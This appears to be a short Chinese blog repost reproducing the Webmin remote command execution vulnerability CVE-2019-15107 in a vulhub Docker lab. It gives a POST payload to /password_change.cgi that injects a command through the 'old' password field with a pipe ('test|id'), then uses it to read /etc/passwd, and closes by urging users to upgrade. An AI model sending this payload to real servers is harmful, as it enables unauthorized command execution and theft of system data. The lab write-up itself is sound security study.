首页 > Web开发 > 详细

CVE-2019-15107 Webmin远程命令执行漏洞复现

时间:2020-12-20 23:18:27      阅读:101      评论:0      收藏:0      [点我收藏+]

一、环境搭建

1、下载vulhub源码,下载链接:https://vulhub.org/#/index/

2、靶场虚拟机中安装好docker环境

3、进入到vulhub对应的漏洞目录中,使用命令docker-compose up -d,启动即可

技术分享图片

 访问https://靶场ip:10000,即可看到webmin登录界面技术分享图片

 二、漏洞复现

1、启动浏览器,访问到webmin登录界面

2、访问/password_change.cgi目录

以POST的方式发送POC:user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2,可以看到成功执行id命令

技术分享图片

 4、将id命令,换成cat /etc/passwd,一样正常执行

技术分享图片

 

该漏洞利用方式简单,成功利用可直接向服务器执行命令,风险极高,使用webmin的用户要注意升级

CVE-2019-15107 Webmin远程命令执行漏洞复现

原文:https://www.cnblogs.com/sym945/p/14165145.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!